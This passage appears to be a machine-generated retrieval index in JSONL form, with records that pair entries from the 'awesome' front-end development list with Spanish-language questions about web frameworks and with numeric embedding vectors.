-0.11765, 0.03101, -0.04394, -0.02963, -0.01415, 0.05671, 0.1493, 0.02933, 0.10134, -0.00509, -0.03437, -0.01881, -0.02773, -0.04122, -0.09376, -0.01323, 0.03301, -0.07357, 0.05357, 0.0403, -0.1799, -0.01099, 0.00601, 0.03952, -0.02837, -0.02579, 0.01335, -0.0754, 0.03623, 0.10433, -0.02472, -0.07967, -0.03898, 0.00454, -0.04294, 0.01176, 0.14629, -0.02481, -0.03226, 0.02998, 0.03332, -0.1138, -0.05545, -0.0075, -0.0654, -0.14465, 0.02715, 0.01906, 0.11297, -0.09377, 0.13807, -0.0446, -0.02136, 0.0359, -0.03998, -0.05117, 0.04419, -0.01377, -0.07337, 0.0777, -0.02857, 0.03166, 0.04256, -0.01995, 0.04719, -0.0029, 0.16073, 0.09078, 0.0144, 0.06811, -0.02182, -0.0397, 0.09881, -0.02154, -0.08399, 0.07364, -0.16288, -0.04589, 0.06374, -0.14492, 0.03252, -0.06383, 0.11456, 0.00149, -0.05863, -0.07896, -0.12583, -0.09466, 0.10226, -0.02829, 0.02567, -0.04397, -0.01361, 0.01584, -0.0716, 0.00337, 0.00295, 0.15109, 0.06226, -0.07248, -0.09724, 0.00557, 0.05078, -0.08502, -0.09926, -0.05976, -0.09219, 0.03371, -0.06864, -0.02302, -0.02564, -0.13231, -0.06069, -0.09516, -0.03596, -0.03176, -0.05751, 0.05506, 0.03689, 0.03896, 0.01297, -0.12015, 0.05663, 0.01182, -0.0597, 0.02828, -0.02185, 0.07641, 0.01235, 0.03296, 0.01718, 0.02709, 0.0533, -0.06261, -0.04762, 0.00659, -0.02907, -0.05322, -0.01231, -0.01177, -0.13616, 0.0433, -0.03315, 0.03241, 0.03349, -0.03769, -0.0584, -0.02434, -0.07019, -0.01582, -0.06845, 0.04512, -0.0417, 0.00856, 0.04774, 0.03793, 0.03842, 0.01403, -0.05139, 0.08854, 0.06518, 0.01177, -0.04164, 0.07477, -0.05037, -0.13484, -0.00082, 0.02072, -0.05802, 0.01038, 0.09919, 0.03693, 0.03055, -0.0399, -0.03406, -0.02085, -0.08223, -0.06852, 0.05679, -0.07439, -0.0001, 0.04093, 0.05308, -0.02001, -0.02312, 0.00055, 0.05449, -0.07886, -0.08098, -0.04038, 0.01414, -0.02433, -0.03933, -0.05532, 0.02707, -0.06191, 0.04058, 0.07529, 0.01373, -0.09318, -0.04372, 0.07066, 0.01379, -0.05254, 0.0462, -0.03711, -0.02635, -0.07901, 0.09561, -0.07564, -0.05782, -0.03966, 0.05942, -0.0095, -0.01319, 0.02216, 0.05147, 0.02972, 0.06723, -0.00612, -0.00819, -0.03062, -0.03584, -0.0051, -0.05507, 0.00479, 0.03681, -0.01927, -0.03531, 0.0109, -0.09536, -0.06615, -0.0285, 0.00085, 0.03728, -0.02076, 0.02764, -0.06136, -0.09386, -0.02114, -0.00363, -0.03795, -0.01466, -0.05952, 0.03512, -0.02095, 0.05349, -0.02097]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "que herramienta sirve para editar textos riques como HTML?", "v": [-0.08263, -0.04372, -0.06689, -0.14756, 0.10235, -0.20751, -0.13253, -0.03739, 0.1756, -0.01661, -0.0882, -0.07015, 0.07122, -0.12346, 0.10149, 0.06261, 0.13133, -0.12079, 0.03545, -0.03288, -0.01573, -0.02648, -0.17604, 0.0104, -0.14447, -0.15779, 0.01323, 0.04387, -0.20406, -0.00916, 0.0118, 0.01527, -0.06475, -0.05193, -0.15783, 0.05048, -0.01854, 0.08004, -0.1, 0.11874, 0.00289, 0.10089, -0.06496, 0.00902, -0.0896, 0.03676, 0.0302, -0.01549, -0.0484, 0.08527, 0.04995, -0.07958, -0.18116, 0.00928, -0.07213, 0.00507, 0.22372, -0.12956, -0.04843, -0.08903, 0.01593, 0.01432, -0.02066, -0.11591, -0.01736, -0.02036, -0.01295, -0.04758, -0.05858, 0.12957, -0.01885, 0.04924, 0.0689, -0.01676, -0.01221, -0.02182, -0.05227, -0.01331, 0.02807, 0.05452, 0.05618, -0.02589, -0.10533, 0.01886, 0.0328, -0.04835, -0.02125, -0.05937, -0.00433, -0.04083, 0.05078, 0.07238, 0.01993, -0.04671, -0.09207, -0.06463, 0.05388, -0.09644, 0.0757, -0.04812, 0.11126, -0.10869, -0.09158, 0.01221, 0.04641, 0.01931, 0.00122, -0.03588, -0.05147, 0.02581, 0.08371, -0.00927, -0.01032, 0.00098, -0.01803, 0.05047, 0.0599, -0.01203, 0.0028, -0.0899, 0.04092, 0.0174, -0.11043, 0.0214, 0.04805, 0.02529, 0.02421, 0.00812, -0.02855, -0.05437, -0.02017, -0.04318, -0.08735, 0.03949, -0.01823, -0.03055, 0.03786, -0.04876, 0.01114, -0.04424, -0.02547, 0.04402, -0.11818, 0.02577, 0.01399, 0.03772, 0.05929, 0.02144, -0.02876, -0.06881, 0.04632, -0.03045, -0.01342, 0.02938, -0.09954, -0.02631, -0.03676, 0.06041, -0.13685, 0.02836, -0.06921, -0.07559, 0.06743, 0.00537, 0.00835, 0.02271, -0.04701, 0.00404, 0.10656, 0.03549, 0.07679, -0.02517, 0.06613, -0.02771, 0.01101, -0.01587, -0.07868, 0.04861, -0.01312, -0.04232, 0.0182, -0.0548, -0.05284, 0.01723, 0.01577, -0.05707, 0.03659, -0.02356, -0.04824, -0.05525, -0.07468, 0.01089, -0.02404, -0.05837, 0.04162, 0.05075, -0.05185, -0.02007, 0.06556, -0.01592, -0.01099, -0.04424, 0.01179, -0.02247, 0.02787, 0.02769, 0.01893, -0.00906, 0.0306, 0.04125, 0.02661, 0.00288, -0.02692, -0.00574, -0.00024, -0.03349, 0.00471, 0.00338, -0.01877, 0.00164, 0.0328, -0.032, 0.008, -0.05556, 0.04089, 0.00449, -0.00142, 0.00343, -0.00246, 0.01893, 0.02455, -0.07373, -0.04502, 0.03816, 0.02123, -0.04056, 0.0036, -0.01707, -0.06816, 0.00057, -0.04333, -0.01529, -0.01084, -0.02967, -0.03618, -0.00725, -0.00228, -0.03284, -0.06686, -0.02913, -0.06819, -0.00458, 0.03931, -0.00381, -0.01168, 0.01678]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "cual es una alternativa libre al framework React?", "v": [-0.09608, 0.02381, -0.06403, -0.04968, 0.01899, -0.01779, -0.0689, -0.03125, -0.17369, 0.03169, -0.05026, -0.20221, -0.0717, 0.05202, 0.21142, 0.05248, -0.00167, -0.02175, 0.06849, -0.02508, -0.06204, -0.1013, -0.14198, -0.05111, 0.01275, -0.04834, 0.03257, 0.11948, 0.00842, -0.06391, 0.08763, 0.01876, -0.00317, -0.01833, -0.0425, 0.06536, 0.18289, 0.12488, 0.0428, -0.06619, -0.04966, -0.08833, -0.15555, 0.13654, -0.03914, -0.0419, -0.11517, -0.02274, -0.05392, 0.06518, -0.08534, 0.03541, -0.06443, 0.07628, 0.07208, -0.03261, 0.16402, -0.1106, -0.05503, -0.05068, -0.06818, 0.01699, 0.04094, -0.14238, 0.06003, -0.03595, -0.08535, 0.02388, -0.03245, 0.02976, 0.09318, -0.0534, 0.01124, -0.02543, -0.12119, 0.1223, -0.01798, -0.06545, -0.07386, 0.09977, 0.04527, -0.05804, -0.0181, 0.08326, 0.00968, -0.06926, 0.09451, -0.11533, -0.05231, 0.01404, 0.03527, -0.01273, 0.00724, 0.08036, -0.04873, -0.12257, 0.02929, 0.10065, 0.0034, 0.03078, 0.04374, 0.04276, -0.14019, -0.03596, 0.02935, -0.01119, -0.01327, 0.00572, -0.06844, -0.01067, -0.01982, 0.05125, -0.01994, 0.02198, 0.04728, 0.03194, -0.01731, 0.06076, 0.06707, 0.02602, -0.01979, 0.03364, -0.07233, -0.08703, 0.08373, 0.06757, 0.08262, 0.062, -0.04985, 0.01928, 0.07533, -0.03081, -0.0664, -0.10802, -0.12623, -0.03536, 0.11704, 0.009, 0.04123, -0.04548, 0.0146, -0.02544, 0.03281, 0.01443, 0.03141, -0.11075, 0.03614, -0.0591, 0.01669, -0.05029, -0.06962, 0.07192, 0.02409, 0.13808, -0.08494, 0.05314, 0.00646, -0.01576, -0.05446, 0.09933, 0.02407, -0.05416, 0.0045, 0.03659, -0.04136, 0.01143, -0.02434, -0.08346, -0.02444, 0.05453, 0.01763, 0.05095, 0.0783, -0.0695, 0.06074, -0.0612, -0.02302, -0.06911, -0.01399, -0.03529, 0.02957, 0.01551, -0.05342, 0.00371, -0.01668, -0.0366, -0.04592, 0.04942, 0.02449, 0.00993, -0.0531, 0.03291, -0.06962, -0.08895, -0.03741, 0.01465, -0.04935, -0.08989, -0.00246, 0.00686, -0.03579, -0.02526, -0.02758, -0.09629, -0.07072, -0.01168, -0.03872, 0.03925, 0.04097, 0.04127, 0.05015, -0.01772, 0.09271, 0.03493, -0.04333, -0.01007, 0.04788, 0.02107, -0.02493, -0.01548, 0.01955, 0.03119, 0.03033, 0.01873, 0.0028, 0.01789, -0.00931, 0.05146, -0.04154, -0.01582, 0.02991, -0.01618, 0.00187, -0.01644, 0.01556, -0.00621, -0.02112, 0.01904, 0.00333, -0.0282, 0.07309, 0.03545, -0.04723, -0.0236, -0.00919, 0.03569, -0.06513, -0.01984, -0.03273, -0.05735, -0.05854, 0.02297, -0.00425, -0.02402, 0.01758, -0.00012]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Cycle.js β€” Functional and reactive JavaScript framework. Text Editing. Motion UI Design. Vue.js β€” App framework. Marionette.js β€” App framework. Aurelia β€” App framework. Charting. Ionic Framework. Chrome DevTools. PostCSS β€” CSS tool. Draft.js β€” Rich text editor framework for React. Service Workers. Progressive Web Apps. choo β€” App framework. Redux β€” State container for JavaScript apps. Browserify β€” Module bundler. Sass β€” CSS preprocessor. Ant Design β€” Enterprise-class UI design language. Less β€” CSS preprocessor. WebGL β€” JavaScript API for rendering 3D graphics. Preact β€” App framework. Progressive Enhancement. Next.js β€” Framework for server-rendered React apps. lit β€” Library for building web components with a declarative template system. JAMstack β€” Modern web development architecture based on client-side JavaScript, reusable APIs, and prebuilt markup. WordPress-Gatsby β€” Web development technology stack with WordPress as a back end and Gatsby as a front end. Mobile Web Development β€” Creating a great mobile web experience.", "indexar": "con que puedo crear aplicaciones que funcionen en navegadores sin instalar nada extra?", "v": [0.07148, 0.15696, -0.18993, -0.1726, 0.06022, -0.05667, -0.00491, -0.03325, -0.15428, -0.04286, -0.09845, -0.07202, -0.09318, -0.08248, 0.01588, 0.00776, 0.02825, -0.14533, 0.07387, 0.03226, -0.05297, -0.04889, -0.09375, -0.05028, -0.03413, 0.03463, -0.03803, -0.03482, -0.10381, -0.07329, -0.00622, 0.00363, 0.1389, -0.03289, -0.08333, -0.06058, -0.01877, -0.0861, -0.00229, 0.01702, 0.07992, 0.07917, -0.07083, 0.07887, -0.07824, 0.05886, 0.06683, -0.07699, -0.02534, -0.03523, 0.05437, -0.01922, -0.10301, 0.00259, -0.01964, -0.12341, 0.14742, -0.17044, 0.06491, 0.03809, -0.06877, 0.1571, 0.00787, 0.07579, 0.11459, -0.03618, 0.04429, 0.05672, -0.06326, 0.06983, -0.03177, 0.06848, -0.03749, 0.03868, 0.10287, 0.16329, -0.05243, -0.05016, 0.01636, 0.04116, 0.03554, -0.02692, -0.08122, -0.09485, -0.03407, -0.13318, -0.02194, 0.00306, 0.04862, -0.10086, 0.04414, 0.02916, -0.00485, 0.00052, 0.02887, -0.09072, 0.15628, 0.00712, 0.06299, 0.12062, -0.00758, -0.06721, 0.01562, 0.10915, -0.06936, -0.04234, 0.08831, -0.11392, 0.0222, -0.05424, 0.0349, -0.04046, -0.01151, -0.04615, -0.00195, 0.04624, -0.0595, -0.07797, -0.05455, -0.05212, -0.09534, -0.0821, -0.06472, 0.01462, 0.00775, -0.0141, -0.00131, 0.07445, -0.02694, 0.06366, 0.053, -0.11616, -0.0445, 0.03923, -0.08801, 0.02704, -0.02508, 0.00261, -0.00349, -0.02537, 0.06921, 0.065, -0.02318, -0.00071, 0.04971, 0.06808, -0.02201, -0.0106, -0.00337, -0.06133, 0.08738, -0.03541, -0.04381, 0.07577, -0.06203, -0.00427, 0.02629, -0.02272, 0.03269, 0.04861, 0.01326, 0.0782, -0.02445, 0.01106, -0.07635, -0.06078, -0.0969, -0.02694, 0.11598, 0.07613, -0.05397, 0.0821, 0.0426, -0.11794, 0.0661, -0.00461, -0.00626, 0.01591, 0.06407, -0.04924, -0.02885, -0.01634, 0.04027, -0.01418, -0.05688, -0.10798, -0.04055, -0.01838, -0.06276, 0.03238, 0.00397, 0.05775, -0.0425, -0.00958, 0.04257, -0.01039, 0.04001, -0.08489, -0.05097, -0.03734, 0.0088, 0.01745, -0.00926, -0.04667, 0.05857, 0.02743, -0.01611, 0.08361, 0.01679, 0.06842, 0.02455, -0.00625, 0.00233, 0.01749, 0.00138, -0.052, 0.0624, 0.02421, -0.0041, -0.0311, -0.00574, -0.01332, -0.01712, 0.00049, 0.02409, 0.033, 0.0172, -0.004, -0.03162, 0.0211, 0.00619, -0.04583, -0.02059, -0.06973, 0.02455, 0.01039, 0.00083, -0.01671, -0.03609, 0.0083, -0.03549, 0.04561, 0.06391, -0.03666, -0.05092, -0.0372, -0.03502, -0.01665, -0.02135, -0.05018, -0.04351, 0.08559, 0.08205, -0.0167, 0.04466, 0.02808]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "que herramienta sirve para desarrollar componentes de interfaz de usuario de forma rΓ‘pida?", "v": [0.01215, 0.07952, -0.20929, -0.28584, 0.12959, -0.1427, -0.08795, -0.03128, -0.00628, -0.03708, -0.03225, -0.06099, -0.07998, -0.09955, 0.08142, 0.01888, 0.11529, -0.11846, -0.06245, -0.00966, 0.00367, 0.01039, -0.08726, -0.04801, -0.14839, 0.01956, 0.01933, -0.06438, -0.15353, 0.00612, 0.0506, -0.04118, 0.04628, -0.02567, -0.13857, -0.11099, -0.00717, -0.01012, -0.03083, 0.10102, 0.02281, 0.01844, -0.11125, 0.03555, 0.08011, 0.10499, -0.09292, -0.02539, 0.03731, 0.09923, 0.01643, -0.12936, -0.06439, 0.0434, -0.01398, -0.17541, 0.2212, -0.21267, 0.04575, -0.08201, -0.05834, 0.02124, -0.05145, -0.03078, -0.0075, -0.08492, -0.12164, -0.0474, -0.02217, 0.03172, -0.03008, 0.0362, 0.00425, -0.07866, 0.02037, 0.08677, -0.03708, 0.06591, 0.1308, 0.03536, 0.10379, -0.01406, -0.09126, -0.04467, -0.0526, -0.03622, 0.11822, 0.00189, -0.00826, -0.02067, 0.04873, 0.05558, 0.02608, -0.01703, 0.04649, -0.0523, 0.02077, 0.05946, 0.05195, -0.03169, 0.10339, -0.01278, -0.08324, 0.09381, -0.05151, -0.01656, -0.00321, -0.02932, -0.07236, -0.02024, 0.07917, 0.04735, 0.03065, -0.02636, -0.04432, 0.04893, -0.00609, -0.05457, -0.05707, -0.07532, 0.02258, 0.01076, -0.02255, -0.04224, 0.00567, 0.00278, -0.05792, 0.07947, 0.00323, -0.07665, -0.00827, -0.09697, -0.06161, 0.01051, -0.01097, 0.00846, -0.02679, -0.08037, 0.00302, -0.04988, 0.11242, 0.04434, -0.02213, -0.08382, 0.00444, 0.01409, 0.06487, -0.05126, -0.03818, 0.01848, 0.02666, -0.04606, -0.01734, -0.01125, -0.0911, -0.06378, -0.00886, -0.01444, -0.06286, 0.01192, -0.04698, 0.01144, 0.00165, 0.04781, 0.00047, -0.12278, -0.02671, 0.02976, 0.09077, 0.06904, 0.04117, -0.00461, 0.08396, -0.03974, -0.00638, 0.02334, -0.06057, 0.01706, -0.03183, -0.08499, -0.0102, -0.00259, -0.04558, -0.0003, -0.06384, -0.06986, -0.01594, -0.015, -0.02346, 0.02827, -0.00726, 0.07682, 0.01569, -0.02453, 0.03605, -0.00472, -0.0377, -0.03162, 0.00916, -0.06947, -0.00135, 0.00535, 0.02139, -0.06592, 0.00451, 0.06148, 0.01694, -0.00593, 0.02862, 0.0362, 0.04069, -0.00037, 0.04748, 0.01854, 0.0204, -0.04044, 0.05782, 0.01123, 0.03361, -0.03937, -0.02062, 0.00709, 0.00756, 0.01296, 0.02579, -0.02042, 0.00519, -0.01184, 0.01126, -0.02292, 0.01497, -0.01136, -0.00567, -0.04682, 0.02104, -0.04132, 0.01047, -0.04711, -0.04571, -0.04978, -0.00901, 0.04027, -0.00414, -0.01748, -0.0371, -0.02463, -0.05775, -0.0329, -0.01584, -0.0924, -0.06086, -0.01555, 0.09176, -0.00862, 0.01256, -0.0167]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "cual es un framework en Rust que me permita crear aplicaciones web con WebAssembly?", "v": [-0.1283, 0.00032, -0.08619, -0.23388, 0.00268, -0.04093, -0.12989, -0.08404, -0.04116, -0.0495, -0.1748, -0.10942, -0.04589, -0.07462, 0.07331, 0.03506, -0.02792, -0.0589, 0.02321, -0.00198, 0.00091, -0.08757, -0.15635, 0.04256, -0.08853, 0.00689, 0.06777, -0.01508, -0.07671, -0.05789, 0.04507, 0.01614, 0.02115, -0.02624, -0.11459, -0.03367, 0.09236, 0.01868, -0.03198, 0.01805, -0.00735, -0.02187, -0.0588, 0.17048, -0.05446, 0.04819, 0.00576, -0.18029, -0.05593, 0.0019, -0.09993, -0.00081, -0.13263, 0.06712, 0.00219, -0.1035, 0.20442, -0.22372, 0.05302, -0.05056, -0.1115, 0.05449, -0.05624, -0.04804, -0.00345, -0.00954, -0.02056, 0.10664, -0.06392, 0.08577, 0.07435, -0.0397, 0.02541, -0.04268, 0.13838, 0.07087, -0.06273, -0.01617, -0.02257, 0.00674, 0.05792, -0.05782, -0.0392, -0.03934, -0.04695, -0.03491, 0.04759, -0.02056, 0.00419, -0.02231, 0.08701, 0.05471, -0.05857, 0.01263, -0.04554, -0.17846, 0.12056, 0.00651, 0.08369, 0.00511, -0.09668, -0.04399, -0.14185, 0.00418, -0.01902, 0.03389, 0.06387, -0.01951, -0.0354, -0.0174, 0.00833, -0.05052, -0.05993, 0.04472, -0.01358, 0.02399, 0.08928, -0.08135, -0.01251, -0.08898, -0.02043, -0.01873, -0.08386, 0.02575, 0.04685, 0.08189, 0.02359, 0.11485, -0.07787, -0.01679, 0.02901, -0.09974, -0.10608, -0.02072, -0.03824, 0.03053, 0.06408, 0.0293, 0.06573, 0.05715, 0.02311, -0.03719, -0.0182, 0.05939, 0.03273, -0.02214, -0.01367, -0.02297, -0.04388, -0.00981, -0.02713, 0.03059, -0.00478, 0.03536, -0.16351, -0.00901, -0.06558, -0.05677, -0.01819, -0.00309, -0.01767, 0.05241, -0.0032, -0.04729, -0.05952, 0.01468, -0.08852, 0.03114, 0.08176, 0.04956, -0.00109, 0.04952, 0.02272, -0.08831, 0.08268, -0.01443, -0.01432, -0.01636, -0.02191, -0.03203, -0.04355, -0.08784, 0.04531, 0.0536, -0.03531, -0.04642, -0.0171, 0.03912, -0.05849, 0.04783, -0.09658, 0.07397, -0.04348, 0.00354, 0.03516, -0.0053, -0.02447, -0.05618, 0.01337, -0.01607, -0.03339, -0.04887, -0.01591, -0.06424, -0.0311, 0.0433, 0.02139, -0.00285, 0.00554, 0.05643, 0.03809, 0.01843, 0.03699, -0.01882, 0.00488, -0.02668, 0.07043, 0.03099, -0.05861, -0.02841, -0.00576, -0.02879, -0.01298, -0.00917, 0.0255, 0.01757, -0.02409, -0.00681, -0.01323, -0.03293, 0.00073, -0.11705, -0.03059, -0.07414, -0.03714, -0.00286, -0.01078, -0.03505, -0.05902, -0.02013, -0.01418, 0.03684, -0.02274, -0.01419, 0.00323, -0.03382, -0.06942, 0.01684, -0.04531, -0.03465, -0.04057, 0.00519, 0.03394, -0.02943, 0.02423, 0.01635]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: Storybook β€” Development environment for UI components. Blazor β€” NET web framework using C#/Razor and HTML that runs in the browser with WebAssembly. PageSpeed Metrics β€” Metrics to help understand page speed and user experience. Tailwind CSS β€” Utility-first CSS framework for rapid UI development. Seed β€” Rust framework for creating web apps running in WebAssembly. Web Performance Budget β€” Techniques to ensure certain performance metrics for a website. Web Animation β€” Animations in the browser with JavaScript, CSS, SVG, etc. Yew β€” Rust framework inspired by Elm and React for creating multi-threaded frontend web apps with WebAssembly. Material-UI β€” Material Design React components for faster and easier web development. Building Blocks for Web Apps β€” Standalone features to be integrated into web apps. Svelte β€” App framework. Design systems β€” Collection of reusable components, guided by rules that ensure consistency and speed. Inertia.js β€” Make single-page apps without building an API.", "indexar": "como puedo asegurarme de que mi sitio web tenga una buena velocidad y experiencia de usuario?", "v": [-0.03523, 0.08472, -0.21441, -0.00122, -0.05395, 0.00576, -0.12729, -0.07747, -0.05013, -0.17327, -0.06307, -0.02112, -0.09479, 0.04042, 0.03656, 0.07633, 0.11975, 0.04332, 0.04816, -0.04749, 0.14759, -0.1148, -0.08022, 0.00226, -0.00546, -0.05865, 0.12316, -0.01334, -0.08864, -0.02126, 0.08912, 0.0781, 0.09124, -0.03409, 0.01495, -0.05647, -0.01139, 0.03203, 0.06415, -0.00767, 0.0165, -0.01999, -0.12156, 0.02874, 0.04451, 0.10845, -0.10171, -0.03977, 0.00336, -0.06372, 0.00237, -0.09201, -0.12704, -0.1155, -0.00248, 0.05407, 0.2308, -0.10071, 0.09979, -0.04007, 0.01931, -0.0094, -0.00943, 0.05615, -0.02756, -0.02456, 0.10735, 0.0025, -0.10131, -0.0454, -0.00146, -0.0027, 0.00814, -0.09536, 0.10936, -0.033, 0.01184, 0.03757, 0.00365, 0.02462, 0.06224, 0.0153, -0.11138, 0.03668, -0.11446, -0.06644, 0.02432, -0.11529, 0.03815, 0.02004, 0.10885, 0.01189, -0.00229, 0.0299, -0.12074, -0.10558, 0.04108, -0.02262, 0.06053, -0.06012, 0.04805, 0.01618, -0.06823, 0.05115, 0.04682, 0.04343, 0.08267, -0.04736, 0.01951, -0.06434, 0.06373, -0.01291, -0.08936, -0.10282, -0.12021, 0.03938, -0.07977, -0.11651, -0.03034, -0.02914, -0.04291, 0.01034, -0.03186, -0.04262, -0.00611, 0.04901, -0.0151, 0.03675, -0.02415, -0.04143, 0.00967, 0.03432, -0.07515, -0.05255, 0.04954, 0.08922, -0.01624, 0.01104, 0.00431, 0.00507, 0.0378, -0.02922, -0.09868, -0.03117, 0.02533, -0.0281, -0.03269, -0.04847, -0.08727, 0.01096, -0.10883, 0.0098, -0.00355, 0.00445, -0.04681, 0.00556, -0.02514, -0.06181, 0.0508, 0.01469, 0.05347, 0.09894, 0.04516, -0.00413, 0.00107, 0.01662, -0.06492, 0.03037, 0.08861, -0.03743, -0.05751, 0.04511, -0.04778, -0.11298, 0.05871, 0.01212, -0.06341, -0.01736, 0.01748, -0.03454, -0.00938, -0.03025, -0.08395, -0.04039, -0.0434, -0.04538, 0.007, -0.01832, 0.00199, 0.06123, 0.06709, 0.0586, 0.002, 0.00914, -0.01215, -0.01758, -0.03867, 0.00268, 0.0195, -0.05312, -0.08352, -0.064, -0.05002, -0.02013, -0.04075, 0.01325, 0.01612, -0.0096, -0.04168, -0.00183, 0.04925, -0.03891, 0.10158, -0.04681, -0.03228, -0.02174, 0.14486, -0.05344, -0.08127, -0.01769, 0.03925, 0.08294, 0.01006, 0.0336, 0.00082, -0.00268, 0.08246, -0.00076, 0.01912, 0.05459, -0.02488, 0.03212, -0.05767, -0.0908, 0.11205, 0.03012, 0.00191, -0.05663, -0.09554, -0.04917, -0.00271, 0.03661, 0.00468, -0.02683, 0.04985, -0.04446, -0.11822, 0.05766, -0.03144, -0.03643, -0.04435, -0.00637, 0.11254, -0.06322, 0.01394, 0.00759]} +{"tipo": "pregunta", "herramienta": "Front-End Development", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Front-End Development", "tema": "front-end development", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Front-End Development: MDBootstrap β€” Templates, layouts, components, and widgets to rapidly build websites. Master CSS β€” A virtual CSS language with enhanced syntax. Hydrogen β€” Edge-first framework for building Shopify storefronts with React. Tiny JS β€” Frontend libraries that fit into 2 kB with dependencies. Frontend GIS β€” Geographic Information Systems (GIS) for web browsers. WebGPU β€” JavaScript API for rendering and compute on GPUs. WebAssembly β€” A portable binary format for running code efficiently across platforms.", "indexar": "que framework o biblioteca me ayuda a montar sitios web rΓ‘pidos con Bootstrap?", "v": [0.02372, 0.04969, -0.22579, -0.20659, -0.05329, -0.03034, -0.01399, 0.01117, -0.07082, -0.09683, -0.09777, 0.00306, 0.05972, 0.09484, 0.03313, -0.005, 0.02675, -0.05676, 0.06838, -0.12653, 0.07826, -0.01718, -0.07045, 0.05294, 0.03182, -0.09251, 0.0727, 0.06476, -0.19139, 0.12183, 0.0157, 0.06532, -0.00525, 0.08256, -0.0839, -0.11553, 0.10091, -0.05084, -0.05791, -0.05499, -0.07974, -0.00879, -0.03056, 0.10665, -0.02616, 0.00111, -0.03904, -0.08349, -0.03126, 0.03695, -0.03064, -0.0281, -0.11707, -0.03249, -0.07492, -0.0822, 0.21116, -0.12156, -0.00079, -0.04516, -0.11605, 0.05468, -0.05879, -0.0563, 0.10521, -0.01864, -0.01276, 0.00709, -0.08359, -0.02219, 0.03488, -0.01317, 0.05741, -0.0316, -0.04552, 0.05694, 0.03879, -0.05691, 0.08747, 0.02754, 0.09562, 